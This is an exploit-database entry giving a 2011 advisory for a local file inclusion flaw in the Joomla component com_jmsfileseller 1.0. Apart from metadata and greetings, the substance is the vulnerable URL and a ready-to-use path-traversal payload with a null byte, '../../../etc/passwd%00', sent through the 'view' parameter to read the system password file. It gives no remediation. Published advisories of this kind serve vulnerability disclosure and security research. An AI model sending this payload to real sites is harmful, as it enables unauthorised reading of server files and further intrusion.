EXPLOITS

Joomla! Component com_jmsfileseller - Local File Inclusion

Author: Valentin
type: webapps
platform: php
port: 
date_added: 2011-05-28  
date_updated: 2016-11-02  
verified: 0  
codes: OSVDB-72982  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 17338.txt  

# Exploit Title: Joomla Component com_jmsfileseller Local File Inclusion Vulnerability
# Date: 28.05.2011
# Author: Valentin
# Category: webapps/0day
# Version: 1.0

# Tested on:
# CVE :
# Code :


[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
>> General Information
Advisory/Exploit Title = Joomla Component com_msfileseller Local File Inclusion Vulnerability
Author = Valentin Hoebel
Contact = valentin@xenuser.org


[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
>> Product information
Name = JMS FileSeller
Vendor = Joommasters team
Vendor Website = http://joommasters.com/
Affected Version(s) = 1.0


[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
>> Local File Inclusion
URL: index.php?option=com_jmsfileseller&view=<LFI value>&cat_id=1&Itemid=27
Vulnerable parameters: view
Example: index.php?option=com_jmsfileseller&view=../../../etc/passwd%00&cat_id=12&Itemid=27


[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
>> Additional Information
Advisory/Exploit Published = 28.05.2011


[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
>> Misc
Greetz = cr4wl3r, JosS, Todd and Josh from packetstormsecurity.org, exploit-db.com


[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]